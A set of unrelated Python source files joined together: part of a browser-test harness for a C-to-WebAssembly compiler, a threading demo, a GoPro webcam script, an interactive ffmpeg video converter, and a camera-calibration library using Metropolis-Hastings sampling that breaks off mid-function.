window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting, basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
# Inject support code for reporting results. This adds an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-s', 'IN_TEST_HARNESS']
if reporting != Reporting.NONE:
# For basic reporting we inject JS helper functions to report results back to the server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
# also compile in report_result.cpp and force-include report_result.h
args += ['-I' + TEST_ROOT,
'-include', test_file('report_result.h'),
test_file('report_result.cpp')]
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args
args = args.copy()
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-s', 'GL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure,
make,
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = Path(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
# When debugging it is sometimes useful to comment this out (together with the rmtree above)
shutil.copytree(source_dir, project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = os.environ.copy()
env.update(env_init)
if not native:
# Inject emcmake, emconfigure or emmake accordingly, but only if we are
# cross compiling.
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
else:
make = [EMMAKE] + make
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
print('-- configure stdout --')
print(read_file(Path(project_dir, 'configure_out')))
print('-- end configure stdout --')
print('-- configure stderr --')
print(read_file(Path(project_dir, 'configure_err')))
print('-- end configure stderr --')
raise
# if we run configure or cmake we don't then need any kind
# of special env when we run make below
env = None
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, read_binary(f)))
return generated_libs
|
Thread.py
|
import concurrent.futures
import threading
import time
start = time.perf_counter()
def do_something(seconds):
print(f'Sleeping {seconds} second(s)...')
time.sleep(seconds)
return f'Done Sleeping...{seconds}'
with concurrent.futures.ThreadPoolExecutor() as executor:
secs = [5, 4, 3, 2, 1]
results = executor.map(do_something, secs)
for result in results:
print(result)
threads = []
for _ in range(10):
t = threading.Thread(target=do_something, args=[1.5])
t.start()
threads.append(t)
for thread in threads:
thread.join()
finish = time.perf_counter()
print(f'Finished in {round(finish-start, 2)} second(s)')
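# A minimal extra sketch (added for illustration, not part of the original
# example): the same work can be submitted with executor.submit() and collected
# with as_completed(), which yields results in completion order instead of
# submission order.
with concurrent.futures.ThreadPoolExecutor() as executor:
    futures = [executor.submit(do_something, sec) for sec in [3, 2, 1]]
    for future in concurrent.futures.as_completed(futures):
        print(future.result())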
|
hero9-take-photo-webcam.py
|
import sys
import time
from goprocam import GoProCamera, constants
import threading
def take_photo(interface):
gopro = GoProCamera.GoPro(ip_address=GoProCamera.GoPro.getWebcamIP(
interface), camera=constants.gpcontrol, webcam_device=interface)
while True:
gopro.take_photo()
time.sleep(2)
print("Photo taken")
cameras = sys.argv[1]
cameras = cameras.split(",")
for interface in cameras:
thr = threading.Thread(target=take_photo, args=(interface,))
thr.start()
|
video-processor.py
|
import ffmpeg, sys, numpy, traceback, time, os, platform, threading, subprocess
from subprocess import call
#from rich import print
#pip install ffmpeg-python
def OS_info():
global width; width = os.get_terminal_size().columns
terminal = os.environ.get('TERM')
#width_len = len(width)
cwd = os.getcwd()
# IP_INFO = f"\033[1;35;0m {IPx.IP}"
current_version = platform.release(); system_info = platform.platform(); os_name0 = platform.system(); current_platform = platform.system()
platform_name = sys.platform; big_names = platform.uname(); processor = platform.processor(); architecture = platform.architecture(); user_id = os.uname() ;login = os.getlogin()
print()
print('X' * 50)
print(f'**[SYSTEM INFO]**'.center(width))
print()
print(f'\033[1;35;m [CURRENT_PLATFORM]--[{current_platform}] ...? '.center(width))
print(f'\033[1;35;m [PLATFORM_NAME]--[{platform_name}] ...? '.center(width))
print(f'\033[1;35;m [CURRENT_VERSION]--[{current_version}] ...? '.center(width))
print(f'\033[1;35;m [OS-NAME]--[{os_name0}] + [{terminal}] ...? '.center(width))
print(f'\033[1;35;m [SYSTEM-INFO]--[{system_info}] ...? '.center(width))
print(f'\033[1;35;0m [CURRENT-VERSION]--[{current_version}] ...? '.center(width))
print(f'\033[1;35;0m [UUID]--[{big_names}] ...? '.center(width))
print(f'\033[1;35;0m [PROCESSOR]--[{processor}] ...? '.center(width))
print(f'\033[1;35;0m [ARCHITECTURE]--[{architecture}] ...? '.center(width))
print(f'\033[1;35;0m [USER-ID]--[{user_id}] ...? '.center(width))
print(f'\033[1;35;0m [LOGIN]--[{login}] ...? '.center(width))
print('X' * 50)
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
def display_header():
# print('*' * 75)
color_red = Colors()
global red0
red0 = color_red.fgRed
global reset0
reset0 = color_red.reset
x = 'x'
print(f"{'X' * 125:^70}")
print(f"{'X' * 125:^70}")
pretty = f'{red0}xxx FILE-MOVER xxx{reset0}'.center(width)
print(f'{pretty : ^70}')
print(f"{'X' * 125: ^70}")
one = (
f'{bblue}[SCRIPT] *** A/V Converter *** {bblue}')
two = (
f'[USAGE] - [1] The Program can: 1.] re-encode AV containers to whatever format is needed. IE- .MP4 -> .MOV')
three = (
f'[USAGE] - [2] Trim AV, with Min/Max Values && duration ')
four = (f'[USAGE] - [3] Compresses the AV, by rescaling resolution and resizing file')
five = (
f'[USAGE] - [5] Play Videos.{reset}')
six = (f'{red}[+]-[+] copyright material from Adel Al-Aali [+]-[+] {reset}')
seven = (f'[+] Future Addition: Attach to OS.Listwalker and implement Generator/text feed to auto convert large lists [+]')
print(f"{one:^70}")
print(f"{two:^70}")
print(f"{three:^70}")
print(f"{four:^70}")
print(f"{five:^70}")
print(f"{six:^70}")
print(f"{seven:^70}")
print(f"{x * 20: ^70}")
print(), print()
class Colors:
reset = "\033[0m"
# Black
fgBlack = "\033[30m"
fgBrightBlack = "\033[30;1m"
bgBlack = "\033[40m"
bgBrightBlack = "\033[40;1m"
# Red
fgRed = "\033[31m"
fgBrightRed = "\033[31;1m"
bgRed = "\033[41m"
bgBrightRed = "\033[41;1m"
# Green
fgGreen = "\033[32m"
fgBrightGreen = "\033[32;1m"
bgGreen = "\033[42m"
bgBrightGreen = "\033[42;1m"
# Yellow
fgYellow = "\033[33m"
fgBrightYellow = "\033[33;1m"
bgYellow = "\033[43m"
bgBrightYellow = "\033[43;1m"
# Blue
fgBlue = "\033[34m"
fgBrightBlue = "\033[34;1m"
bgBlue = "\033[44m"
bgBrightBlue = "\033[44;1m"
# Magenta
fgMagenta = "\033[35m"
fgBrightMagenta = "\033[35;1m"
bgMagenta = "\033[45m"
bgBrightMagenta = "\033[45;1m"
# Cyan
fgCyan = "\033[36m"
fgBrightCyan = "\033[36;1m"
bgCyan = "\033[46m"
bgBrightCyan = "\033[46;1m"
# White
fgWhite = "\033[37m"
fgBrightWhite = "\033[37;1m"
bgWhite = "\033[47m"
bgBrightWhite = "\033[47;1m"
def period_wait():
period = ['.', '.', '.', '.', '.', '.', '.', '.', '.', '.']
# multi = [2,2,2,2,2,2,2,2,2,2]
period_len = len(period)
with Spinner():
for z, x in enumerate(period):
print(x)
time.sleep(.2)
if z <= period_len:
z += 1
print(f"{yellow}{x * z}{reset}")
continue
elif z == period_len:
break
def clear():
# check and make call for specific operating system
os_name = platform.system()
_ = call('clear' if os_name in ('Linux', 'Darwin') else 'cls')
###########
color = Colors()
spinner = Spinner()
yellow = color.fgYellow
red = color.fgRed
blue = color.fgBlue
bblue = color.fgBrightBlue
cyan = color.fgCyan
bg_background = color.bgBlack
reset = color.reset
def splash():
with Spinner():
display_header()
period_wait()
time.sleep(8)
clear()
### display headers ##
OS_info()
time.sleep(5)
clear()
splash()
class VideoEditor():
def __init__(self):
print(f'[+] Enter **[Desired]** File Name ex:: [sample.mp4], \n\t[+] Press Enter for default file_name [new_vid]\n')
self.file00 = input('')
if self.file00 == '':
self.file00 = 'new_vid.mp4'
self.cwd = os.getcwd()
print(f" \n {'x'*50} \n [++] CWD :: \n \t [{self.cwd}][++]\n")
self.vid_loc = input('[+] Enter Video Location')
self.streamVideo = ffmpeg.input(self.vid_loc)
def __repr__(self):
return "<VideoEditor file00=%r>" % (self.file00,)
def __str__(self):
return "VideoEditor for file %s" % (self.file00,)
def trimVideo(self):
try:
print('\n','X'*50)
trim_start = time.time(); CTtime = time.ctime(trim_start)
start = f'[+] -- [INITIATING TRIM SEQUENCE] [+] \n{CTtime}'
print(f'[+] Enter the Desired Start and Duration [+] \n[+]** [START] ')
tstart = input('')
print(f'[+]** [DURATION] ')
tdur = input('')
print()
print(f'{start}')
streamVideo = self.streamVideo.trim(start=tstart, duration=tdur)
streamVideo = ffmpeg.output(streamVideo, self.file00)
ffmpeg.run(streamVideo)
trim_end = time.time(); ct_end = trim_end - trim_start
end = f'[+] \n\t Completion Seconds [{round(ct_end, 3)}]'
print(f'{end}')
encoding_text = 'ff_manip.txt'
with open(encoding_text, 'a') as f:
f.write(str('meta\n' + str(self.streamVideo))+'\n'+'\n')
f.write(str('trim data' + str(start) +'\n'+'\n'))
f.write(str('trim_start'+ str(end)+ '\n'+'\n'))
f.write(str('trim_end' + str(end)+ '\n'+'\n'))
f.write(str(streamVideo))
print(f'[+] Trim Data Saved to \n{encoding_text}')
return f'[+] Successfully trimmed data \n \t\t[START] [{tstart}] :: [DUR] [{tdur}]'
except Exception as e:
traceback.print_exc()
return f'[-] Error in Trim Parse \n \n [{e}]\n\t\t :: [FILE_NAME]--[[{self.file00}]] :: \t\t[START] [{tstart}] :: [DUR] [{tdur}] \n{traceback.print_exc()}'
def encoder(self):
try:
print('\n', 'X'*50)
print('[+] Enter The Desired Filename / Encoding [ex: output.mp4]')
encode_out = input('')
encode_start = time.time(); ECTtime = time.ctime(encode_start)
start = f'[+] -- [INITIATING ENCODE SEQUENCE] [+] \n{ECTtime}'
print(f'{start}')
streamVideo = ffmpeg.output(self.streamVideo, encode_out)
ffmpeg.run(streamVideo)
encode_end = time.time(); ect_end = encode_end - encode_start
end = f'[+] \n\t Completion Seconds [{round(ect_end, 3)}]'
print(f'{end}')
encoding_text = 'ff_manip.txt'
with open(encoding_text, 'a') as f:
f.write(str('meta\n' + str(self.streamVideo))+'\n'+'\n')
f.write(str('encoding start' + str(start))+'\n'+'\n')
f.write(str('encoding end' + str(end))+'\n'+'\n')
f.write(str('encoding data ' + str(streamVideo)+'\n')+'\n')
print(f'[+] Encoding Data Saved to \n{encoding_text}')
return f'[+] [Successfully Formatted Data] \n \t\t[FILE_NAME] [{encode_out}] :: '
except Exception as e:
traceback.print_exc()
return f'[-] Error in Encoding \n \n [{e}] \t\t:: [FILE_NAME]--[[{self.file00}]] :: \n{ traceback.print_exc()}'
def changeFPS(self):
try:
print('\n','X'*50)
print('[+] Enter The Desired fps [must be INT]\n **')
fps = input('')
fps = int(fps)
fps_start = time.time()
fpsctime = time.ctime(fps_start)
start = f'[+] -- [INITIATING FPS CHANGE] [+] \n{fpsctime}\t\t [FPS] --[{fps}]'
print(f'{start}')
streamVideo = self.streamVideo.filter('fps', fps=fps, round='up')
streamVideo = ffmpeg.output(streamVideo, self.file00)
ffmpeg.run(streamVideo)
encoding_text = 'ff_manip.txt'
print(f'[+] [CHANGE FPS -- SUCCESS] \n{streamVideo}')
fps_end = time.time(); fect_end = fps_end - fps_start
end = f'[+] \n\t Completion Seconds [{round(fect_end, 3)}]'
print(f'{end}')
with open(encoding_text, 'a') as f:
f.write(str('meta' + str(self.streamVideo))+'\n')
f.write(str('encoding start' + str(start))+'\n')
f.write(str('encoding end' + str(fps_end))+'\n')
f.write(str('encoding meta' + str(streamVideo))+'\n')
return f'[+] [Successfully CHANGED DATA FPS ] \n \t\t:: [FILE_NAME]--[[{self.file00}]] :: '
except Exception as e:
traceback.print_exc()
return f'[-] Error in FPS Change \n \n [{e}] \t\t :: [FILE_NAME]--[[{self.file00}]] :: \n{traceback.print_exc()}'
def scaleVideo(self):
try:
print('\n', 'X' * 50)
scalestart = time.time()
cscalestart = time.ctime(scalestart)
start = f'[+] -- [INITIATING VIDEO-SCALER] -- [+] \n{cscalestart}'
print(f'[+] Enter the Desired Scale Resolution *[MUST BE INT]* [+] \n\t\t [+]**[HORIZONTAL]')
horz = input('')
print('\n\t\t[+]**[VERTICAL]')
vert = input('')
scale = f'{horz}x{vert}'
print(f'[+] Entered :: [{str(scale)}]')
print(f'{start}')
streamVideo = self.streamVideo.filter('scale', w=horz, h=vert)
streamVideo = ffmpeg.output(streamVideo, str(self.file00))
ffmpeg.run(streamVideo)
print(f'[+] [SCALE VIDEO -- SUCCESS] \n{streamVideo}')
scale_end = time.time()
scalEnd = scale_end - scalestart
scaleEndC = time.ctime(scale_end)
end = f'[+] \n\t Completion Seconds [{round(scalEnd, 3)}] \n {scaleEndC}'
print(f'{end}')
encoding_text = 'ff_manip.txt'
with open(encoding_text, 'a') as f:
f.write(str('meta' + str(self.streamVideo)))
f.write(str('Scale Start' + start))
f.write(str('Resolution' + scale))
f.write(str('Scale End' + str(scalEnd)))
f.write(str('Scale meta' + str(streamVideo)))
return f'[+] [Successfully Scaled Video ] \n \t\t:: [FILE_NAME]--[[{self.file00}]] :: \n\t\t [{scale}] '
except Exception as e:
traceback.print_exc()
return f'[-] Error in [SCALING VIDEO]\n \n [{e}] \t\t:: [FILE_NAME]--[[{self.file00}]] :: \n{traceback.print_exc()}'
v_Editor = VideoEditor()
affirmative = ["Yes","yes","YES","y","Y","ye","YE",""]
negative = ["No","no","NO","n","N","neg"]
print('[+] A/V Converter.')
try:
print(f"\n {'X'*50}") ## ENCODER
print('[+] Change Encoding?')
encodeA = input('')
if encodeA in affirmative:
flag01 = v_Editor.encoder()
print(f'[++] -- {flag01} -- [++]')
elif encodeA in negative:
print('[-] Passing -- [ENCODE VIDEO]')
pass
print(f"\n {'X'*50}") ## TRIMMER
print('[+] Trim Video?.')
trimA = input('')
if trimA in affirmative:
print('[+] Starting -- [TRIM VIDEO] -- [+]')
flag = v_Editor.trimVideo()
print(f'[++] -- {flag} -- [++]')
print(f"{'X' * 50}\n")
elif trimA in negative:
print('[-] Passing -- [TRIM VIDEO]')
pass
print('[+] Change FPS?') ## FPS
fpsA = input('')
if fpsA in affirmative:
print('[+] Starting --[CHANGE FPS] -- [+].')
flag = v_Editor.changeFPS()
print(f'--[{flag}]--')
elif fpsA in negative:
print('[-] Passing -- [CHANGE FPS]')
pass
## VIDEO SCALER
print(f"\n {'X' * 50}") ## TRIMMER
print('[+] Scale Video?.')
scaleA = input('')
if scaleA in affirmative:
print('[+] Starting -- [SCALE-VIDEO] -- [+]')
flag = v_Editor.scaleVideo()
print(f'[++] -- {flag} -- [++]')
print(f"{'X' * 50}\n")
elif scaleA in negative:
print('[-] Passing -- [VIDEO-SCALER]')
splash()
pass
except Exception as e:
print(f'[-] Error in Trim Parse \n \n [{e}] \t\t \n{traceback.print_exc()}')
# ## reduce video fps
# streamVideo = streamVideo.filter('fps', fps=10, round='up')
# ## change video scaling
# streamVideo = streamVideo.filter('scale', w=128, h=128)
# ## output
# streamVideo = ffmpeg.output(streamVideo, 'output.mov')
# ffmpeg.run(streamVideo)
|
bayesLib.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 22 23:38:35 2017
for UNLP
calibration with uncertainty:
1- intrinsic chessboard calibration with OpenCV
2- take that as the initial condition and optimise a custom error function
3- compute the Hessian at the optimum
4- from it, obtain the covariance of the optimised parameters
test:
1- with images not used for calibration, compute the probability of the
optimal parameters given the test data
@author: sebalander
"""
# %%
#import glob
import numpy as np
from calibration import calibrator as cl
from numpy import any as anny
from scipy.stats import chi2
from scipy.linalg import inv
import numdifftools as ndf
from multiprocess import Process, Queue
modelos = ['poly', 'rational', 'fisheye', 'stereographic']
# https://github.com/uqfoundation/multiprocess/tree/master/py3.6/examples
# %% error function
# MAP TO HOMOGENEOUS PLANE TO GET RADIUS
def int2flat(cameraMatrix, distCoeffs, model):
'''
intrinsic parameters concatenated into a single vector
'''
if model==modelos[3]:
# stereographic case is special
kFlat = cameraMatrix[[0,1],2]
dFlat = np.reshape(distCoeffs, -1)
else:
kFlat = cameraMatrix[[0,1,0,1],[0,1,2,2]]
dFlat = np.reshape(distCoeffs, -1)
X = np.concatenate((kFlat, dFlat))
Ns = np.array([len(kFlat), len(dFlat)])
Ns = np.cumsum(Ns)
return X, Ns
def flat2CamMatrix(kFlat, model):
cameraMatrix = np.eye(3, dtype=float)
if model==modelos[3]:
cameraMatrix[[0, 1], 2] = kFlat
else:
cameraMatrix[[0, 1, 0, 1], [0, 1, 2, 2]] = kFlat
return cameraMatrix
def flat2int(X, Ns, model):
'''
inverse of int2flat
'''
kFlat = X[0:Ns[0]]
dFlat = X[Ns[0]:Ns[1]]
cameraMatrix = flat2CamMatrix(kFlat, model)
distCoeffs = dFlat
return cameraMatrix, distCoeffs
def ext2flat(rVec, tVec):
'''
takes an rvec, tvec pair and returns them concatenated into a single vector
'''
rFlat = np.reshape(rVec, -1)
tFlat = np.reshape(tVec, -1)
X = np.concatenate((rFlat, tFlat))
return X
def flat2ext(X):
'''
inverse of ext2flat
'''
rFlat = X[0:3]
tFlat = X[3:]
rVecs = np.reshape(rFlat, 3)
tVecs = np.reshape(tFlat, 3)
return rVecs, tVecs
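# Small self-contained sanity check (added for illustration; the values below are
# made up): the flattening helpers above should be exact inverses of each other
# for the 'rational' model.
if __name__ == '__main__':
    _K = np.array([[800.0, 0.0, 320.0],
                   [0.0, 810.0, 240.0],
                   [0.0, 0.0, 1.0]])
    _dist = np.array([0.1, -0.05, 0.001, 0.002])
    _X, _Ns = int2flat(_K, _dist, 'rational')
    _K2, _dist2 = flat2int(_X, _Ns, 'rational')
    assert np.allclose(_K, _K2) and np.allclose(_dist, _dist2)
    _rv, _tv = flat2ext(ext2flat(np.array([0.1, 0.2, 0.3]), np.array([1.0, 2.0, 3.0])))
    assert np.allclose(_rv, [0.1, 0.2, 0.3]) and np.allclose(_tv, [1.0, 2.0, 3.0])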
# %%
def errorCuadraticoImagen(Xext, Xint, Ns, params, j, mahDist=False):
'''
the error associated with a single image, for one rvec, tvec pair
it also needs the intrinsic parameters
if mahDist=True it returns the squared Mahalanobis distance for the
projected points
'''
# unpack the flat parameters so the projection function can use them
cameraMatrix, distCoeffs = flat2int(Xint, Ns, params['model'])
rvec, tvec = flat2ext(Xext)
# unpack the auxiliary parameters
imagePoints = params["imagePoints"]
model = params["model"]
chessboardModel = params["chessboardModel"]
Cccd = params["Cccd"]
Cf = params["Cf"]
Ck = params["Ck"]
Crt = params["Crt"]
Cfk = params["Cfk"]
try: # check if there is covariance for this image
Cov = Cccd[j]
except:
Cov = None
# do the projection
xi, yi = imagePoints[j].T
xm, ym, Cm = cl.inverse(xi, yi, rvec, tvec, cameraMatrix,
distCoeffs, model, Cov, Cf, Ck, Crt[j], Cfk)
# error
er = ([xm, ym] - chessboardModel[:,:2].T).T
Cmbool = anny(Cm)
if Cmbool:
# return the squared error weighted by the covariances
S = np.linalg.inv(Cm) # inverse of covariance matrix
# Mahalanobis distance
Er = np.sum(er.reshape((-1, 2, 1))
* S
* er.reshape((-1, 1, 2)),
axis=(1, 2))
if not mahDist:
# add covariance normalisation error
Er += np.linalg.det(Cm)
else:
# plain squared error, without any weighting
Er = np.sum(er**2, axis=1)
return Er
def etotalExt(Xext, Xint, Ns, params, j):
'''
computes the total error as the sum of the errors of every point in each
image
'''
return errorCuadraticoImagen(Xext, Xint, Ns, params, j, mahDist=False).sum()
def errorCuadraticoInt(Xint, Ns, XextList, params, mahDist=False):
'''
the error associated with all the images, used to optimise with respect to
the intrinsic parameters
'''
# error
Er = list()
for j in range(len(XextList)):
# print(j)
Er.append(errorCuadraticoImagen(XextList[j], Xint,Ns, params,
j, mahDist=mahDist))
return np.concatenate(Er)
def etotalInt(Xint, Ns, XextList, params):
'''
computes the total error as the sum of the errors of every point in each
image
'''
return errorCuadraticoInt(Xint, Ns, XextList, params).sum()
# %% metropolis hastings
from numpy.random import rand as rn
class metHas:
def __init__(self, Ns, XextList, params, sampleador):
self.Ns = Ns
self.XextList = XextList
self.params = params
self.generados = 0
self.gradPos = 0
self.gradNeg = 0
self.mismo = 0
self.sampleador = sampleador
def nuevo(self, old, oldE):
# generate a new candidate
new = self.sampleador.rvs() # rn(8) * intervalo + cotas[:,0]
self.generados += 1
# change in error
newE = etotalInt(new, self.Ns, self.XextList, self.params)
deltaE = newE - oldE
if deltaE < 0:
self.gradPos += 1
print("Gradiente Positivo")
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # lower error, accept immediately
else:
# second chance: accept with probability exp(-deltaE / 2)
pb = np.exp(- deltaE / 2)
if pb > rn():
self.gradNeg += 1
print("Gradiente Negativo, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # accepted on the second chance
else:
# # recurse back to step 2 until a candidate is accepted
# print('rejected, pb=', pb)
# new, newE = nuevo(old, oldE)
self.mismo +=1
print("Mismo punto, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return old, oldE
return new, newE
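# Toy illustration (added; not part of the original calibration code): the
# accept/reject rule in metHas.nuevo above is a Metropolis step for a density
# proportional to exp(-E/2). The class draws candidates from self.sampleador;
# the sketch below uses a symmetric random-walk proposal on a 1-D quadratic
# error E(x) = x**2 instead, so its samples should look roughly standard normal.
def _toy_metropolis_demo(n_samples=2000, step=1.0, seed=0):
    rng = np.random.default_rng(seed)
    x, E = 0.0, 0.0
    samples = []
    for _ in range(n_samples):
        x_new = x + step * rng.normal()  # symmetric proposal
        E_new = x_new ** 2               # plays the role of etotalInt
        if E_new < E or np.exp(-(E_new - E) / 2) > rng.random():
            x, E = x_new, E_new          # same acceptance rule as nuevo()
        samples.append(x)
    return np.array(samples)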
class metHasExt:
'''
class to run the Metropolis iterations for the extrinsic
calibration
'''
def __init__(self, Xint, Ns, params, sampleador, priorExt, W):
self.Ns = Ns
self.Xint = Xint
self.params = params
self.generados = 0
self.gradPos = 0
self.gradNeg = 0
self.mismo = 0
self.sampleador = sampleador
self.priorExt = priorExt
self.W = W
def ePrior(self, Xext):
'''
the prior error only applies to the position and not to the angles, because
there is no easy prior information about the angles
'''
return self.W.dot((Xext - self.priorExt)**2)
# error total
def etotalExt(self, Xext):
'''
computes the total error as the sum of the errors of every point in one
image plus the prior
'''
ep = self.ePrior(Xext)
ep += errorCuadraticoImagen(Xext, self.Xint, self.Ns, self.params, 0).sum()
return ep
def nuevo(self, old, oldE):
# generate a new candidate
new = self.sampleador.rvs() # rn(8) * intervalo + cotas[:,0]
self.generados += 1
# change in error
newE = self.etotalExt(new)
deltaE = newE - oldE
if deltaE < 0:
self.gradPos += 1
print("Gradiente Positivo")
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # lower error, accept immediately
else:
# second chance: accept with probability exp(-deltaE / 2)
pb = np.exp(- deltaE / 2)
if pb > rn():
self.gradNeg += 1
print("Gradiente Negativo, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return new, newE # aceptado a la segunda oportunidad
else:
# # recurse back to step 2 until a candidate is accepted
# print('rejected, pb=', pb)
# new, newE = nuevo(old, oldE)
self.mismo += 1
print("Same point, pb=", pb)
print(self.generados, self.gradPos, self.gradNeg, self.mismo)
return old, oldE
return new, newE
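# Illustrative sketch (assumed names): one extrinsic chain for a single image,
# with a prior on the camera position. `sampleadorExt`, `Xext0`, `priorExt`
# (6-vector) and the weight vector `W` are hypothetical here.
#
# mhE = metHasExt(Xint0, Ns, params, sampleadorExt, priorExt, W)
# x = Xext0
# e = mhE.etotalExt(x)
# for _ in range(1000):
#     x, e = mhE.nuevo(x, e)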
# %% functions to compute the intrinsic and extrinsic Jacobians and Hessians
Jint = ndf.Jacobian(errorCuadraticoInt) # (Ns,)
Hint = ndf.Hessian(errorCuadraticoInt) # (Ns, Ns)
Jext = ndf.Jacobian(errorCuadraticoImagen) # (6,)
Hext = ndf.Hessian(errorCuadraticoImagen) # (6,6)
# one wrapper function per worker process
def procJint(Xint, Ns, XextList, params, ret):
ret.put(Jint(Xint, Ns, XextList, params))
def procHint(Xint, Ns, XextList, params, ret):
ret.put(Hint(Xint, Ns, XextList, params))
def procJext(Xext, Xint, Ns, params, j, ret):
ret.put(Jext(Xext, Xint, Ns, params, j))
def procHext(Xext, Xint, Ns, params, j, ret):
ret.put(Hext(Xext, Xint, Ns, params, j))
# %%
def jacobianos(Xint, Ns, XextList, params, hessianos=True):
'''
computes the Jacobians and Hessians of the intrinsic and extrinsic
variables, spawning one process per computation
'''
# where to store the results of the intrinsic-parameter derivatives
jInt = Queue()
if hessianos:
hInt = Queue()
# create and start the processes
if hessianos:
# print('intrinsic computations, 2 processes')
pHInt = Process(target=procHint, args=(Xint, Ns, XextList,
params, hInt))
pHInt.start()
#else:
# print('intrinsic computations, 1 process')
pJInt = Process(target=procJint, args=(Xint, Ns, XextList, params, jInt))
pJInt.start()  # start the process
# where to store the extrinsic Jacobian and Hessian results
n = len(XextList)
jExt = np.zeros((n, 1, 6), dtype=float)
qJext = [Queue() for nn in range(n)]
if hessianos:
hExt = np.zeros((n, 6, 6), dtype=float)
qHext = [Queue() for nn in range(n)]
# list of processes
proJ = list()
if hessianos:
proH = list()
# create and start the processes
for i in range(n):
# print('starting pair of processes ', i + 3)
